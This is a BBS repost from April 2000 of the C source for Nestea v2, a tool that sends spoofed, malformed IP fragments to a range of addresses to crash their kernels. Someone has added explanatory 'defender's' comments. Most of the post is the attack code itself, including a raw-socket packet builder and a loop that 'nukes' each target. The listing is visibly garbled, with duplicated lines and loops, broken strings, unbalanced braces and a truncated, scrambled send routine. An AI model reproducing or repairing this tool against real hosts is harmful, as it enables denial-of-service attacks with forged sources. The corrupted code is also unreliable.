发信人: bstone (Sealed!), 信区: Hacker
标 题: nestea2.c
发信站: BBS 荔园晨风站 (Mon Apr 10 21:47:41 2000), 站内信件
发信人: cloudsky (小四), 信区: Security
标 题: nestea2.c
发信站: 武汉白云黄鹤站 (Mon Apr 10 11:48:38 2000), 站内信件
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
/*
 * Build-time constants, the parsed-address holder and forward declarations
 * for the Nestea v2 listing (a fragment-based denial-of-service tool).
 *
 * Defender's context: the author's own comment on COUNT below states the
 * intent, which is to make the receiving kernel write a few bytes outside
 * the buffer it reassembles IP fragments into. Nestea is generally described
 * as targeting an off-by-one in the Linux 2.0.x/2.1.x fragment reassembly
 * code; that is not stated on this page, so confirm it against the original
 * advisory. Hosts with a corrected reassembly path, or sitting behind a
 * device that drops malformed or overlapping fragments, are not expected to
 * be affected.
 */
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
/* FIX() wraps the IP total-length and fragment-offset values written in
 * send_frags; on these systems the value is passed through unchanged. */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
/* Everywhere else the same fields are converted with htons(). */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
/* MAGIC2 is added to IPH + UDPH to form the total-length value that
 * send_frags writes into the later fragments. */
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */
/* COUNT is the default number of send_frags() rounds per target address,
 * used by main when -n is not given. */
#define COUNT 500 /* we are overwriting a small number of bytes we
shouldnt have access to in the kernel.
to be safe, we should hit them till they die :> */
/* Four octets of a dotted-quad address as filled in by sscanf() in main;
 * startip and endip are file-scope globals holding the two ends of the
 * target range. */
struct ipstuph
{
int p1;
int p2;
int p3;
int p4;
} startip, endip;
/* Forward declarations. Only send_frags has a (partial) definition in this
 * listing; usage, name_resolve and in_cksum are not defined in the visible
 * text, and in_cksum is not called in the visible text either. */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
/*
 * main: command-line driver of the Nestea v2 listing.
 *
 * As visible here: argv[1] is resolved as the source address, argv[2] as the
 * first target and argv[3] as the last target; options -s / -t set the UDP
 * source / destination port, -n the number of rounds per address and -q a
 * terse progress display. For every value of the last octet between the two
 * targets it calls send_frags() `count` times (COUNT when -n is absent),
 * sleeping 500 microseconds between rounds.
 *
 * NOTE(review): this copy of the listing is damaged by the BBS export. The
 * signature, several statements and a whole stretch of the send loop appear
 * twice, string literals are wrapped across lines, and the braces do not
 * balance, so the block does not compile as shown. The code is left
 * byte-for-byte as posted; only comments were added.
 *
 * Defender's notes, grounded in the lines below: the source address is taken
 * from the command line rather than from the sending host, so the source seen
 * in a victim's logs cannot be trusted on its own; the first three octets of
 * both targets must match, so one run covers at most one last-octet range;
 * the traffic is bursts of fragmented UDP to consecutive addresses. Usual
 * countermeasures are a kernel with a corrected reassembly path, dropping
 * malformed or overlapping fragments at the perimeter, and egress filtering
 * of spoofed source addresses.
 */
int main(int argc, char **argv)
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
char hit_ip[18], dst_ip2[18];
struct in_addr addr;
fprintf(stderr, "\n;34mNestea v2 0;34moriginally by0m: ;34mhumble 0;34m+ ;3m
ttol mods0m\n");
fprintf(stderr, "0;34mColor and Instructions was done by 0m: ;34mttol0m\n");
fprintf(stderr, ";34mNote0m : ;34mttol released Nestea v2. humble had nothn
g to do with \n it, don't nag him about it. -ttol@ttol.net0m\n\n");
/* A raw IPPROTO_RAW socket with IP_HDRINCL set: the program supplies the
 * whole IP header itself. Opening a raw socket normally needs elevated
 * privileges, and it is done before the arguments are even checked. */
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror(";34mraw socket0m");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
perror("IP_HDRINCL");
exit(1);
}
if (argc < 4) usage(argv[0]);
/* Both addresses go through name_resolve(); a zero result is treated as
 * failure. */
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, ";34mWhat the hell kind of IP address is that?0m\n");
exit(1);
}
/* NOTE(review): argv[3] is copied into the 18-byte dst_ip2 with no length
 * check. */
strcpy(dst_ip2,argv[3]);
/* The start address is parsed into four ints; only the upper bound (255) of
 * each octet is checked below, negative values are not rejected. */
if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3,
&startip.p4) != 4)
{
fprintf(stderr, ";34mError, arg2(startip) 0m: 0;34mNeed an ip that contais
4 zones0m\n");
exit(1);
}
if (startip.p1 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of start ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
}
if (startip.p2 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 2 of start ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (startip.p3 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 3 of start ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (startip.p4 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 4 of start ip is incorret \
(greater than 255)0m\n");
exit(1);
}
/* The end address gets the same parse and the same upper-bound-only check. */
if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3,
&endip.p4) != 4)
{
fprintf(stderr, ";34mError, arg3(endip) 0m: [[0;34mNeed an ip that \
contains 4 zones[[0m\n");
exit(1);
}
}
if (endip.p1 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of end ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (endip.p2 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 2 of end ip is incorrect \
(greater than 255)0m\n");
exit(1);
}
if (endip.p3 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 3 of end ip is incorrect
(greater than 255)0m\n");
exit(1);
}
if (endip.p4 > 255) {
fprintf(stderr, ";34mError 0m: 0;34mZone 4 of end ip is incorrect
(greater than 255)0m\n");
exit(1);
}
/* Start and end must share their first three octets, so only the last octet
 * varies across the range. */
if (startip.p1 != endip.p1) {
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of start ip and end ip is diffr
fprintf(stderr, ";34mError 0m: 0;34mZone 1 of start ip and end ip is diffr
ent0m\n");
exit(1);
}
if (startip.p2 != endip.p2) {
fprintf(stderr, ";34mError 0m: 0;34mZone 2 of start ip and end ip is diffr
ent0m\n");
exit(1);
}
if (startip.p3 != endip.p3) {
fprintf(stderr, ";34mError 0m: 0;34mZone 3 of start ip and end ip is diffr
ent0m\n");
exit(1);
}
while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
case 'q': /* quiet mode */
bequiet = 1;
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
/* Ports left at zero are replaced by random() values seeded from the clock;
 * a zero count falls back to COUNT. */
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, ";34mDeath 0;34mon flaxen wings (;34myet again0;34m)0m:\n");
addr.s_addr = src_ip;
fprintf(stderr, ";34mFrom0m: 0;34m%15s.%d0m\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
addr.s_addr = dst_ip;
fprintf(stderr, " ;34mTo0m: 0;34m%15s - %s.%d0m\n", inet_ntoa(addr),
dst_ip2, dst_prt);
fprintf(stderr, " ;34mAmt0m: 0;34m%5d0m\n", count);
if (bequiet) fprintf(stderr, "0;34m[;34mquiet mode0;34m] 0;34mEach';34m.0;3m
' represents a nuked ip. 0;34m[0m");
/* Walk the last octet from startip.p4 to endip.p4; each address is rebuilt
 * as text in hit_ip and resolved again before sending. The banner lines and
 * a second copy of this loop follow inside the inner loop in this copy of
 * the listing, which looks like an export artefact. */
for (j=startip.p4; j <= endip.p4; j++)
{
sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
if (!(bequiet)) fprintf(stderr, "0;34m%s ;34m[ 0m", hit_ip);
if (!(dst_ip = name_resolve(hit_ip)))
{
fprintf(stderr, "0;34mWhat the ;34mhell 0;34mkind of IP address is tht
?0m\n");
exit(1);
}
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " ;34mTo0m: 0;34m%15s - %s.%d0m\n", inet_ntoa(addr),
dst_ip2, dst_prt);
fprintf(stderr, " ;34mAmt0m: 0;34m%5d0m\n", count);
if (bequiet) fprintf(stderr, "0;34m[;34mquiet mode0;34m] 0;34mEach';34m.0;3m
' represents a nuked ip. 0;34m[0m");
for (j=startip.p4; j <= endip.p4; j++)
{
sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
if (!(bequiet)) fprintf(stderr, "0;34m%s ;34m[ 0m", hit_ip);
if (!(dst_ip = name_resolve(hit_ip)))
{
fprintf(stderr, "0;34mWhat the ;34mhell 0;34mkind of IP address is tht
?0m\n");
exit(1);
}
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
if (!(bequiet)) fprintf(stderr, "0;34md;34m000;34mm 0m");
/* 500 microsecond pause between rounds. */
usleep(500);
}
if (bequiet) fprintf(stderr, ";34m.0m");
else fprintf(stderr, "0;34m]0m\n");
}
if (bequiet) fprintf(stderr, "0;34m]0m\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
--
我问飘逝的风:来迟了?
风感慨:是的,他们已经宣战。
我问苏醒的大地:还有希望么?
大地揉了揉眼睛:还有,还有无数代的少年。
我问长空中的英魂:你们相信?
英魂带着笑意离去:相信,希望还在。
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 203.207.226.124]
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.106]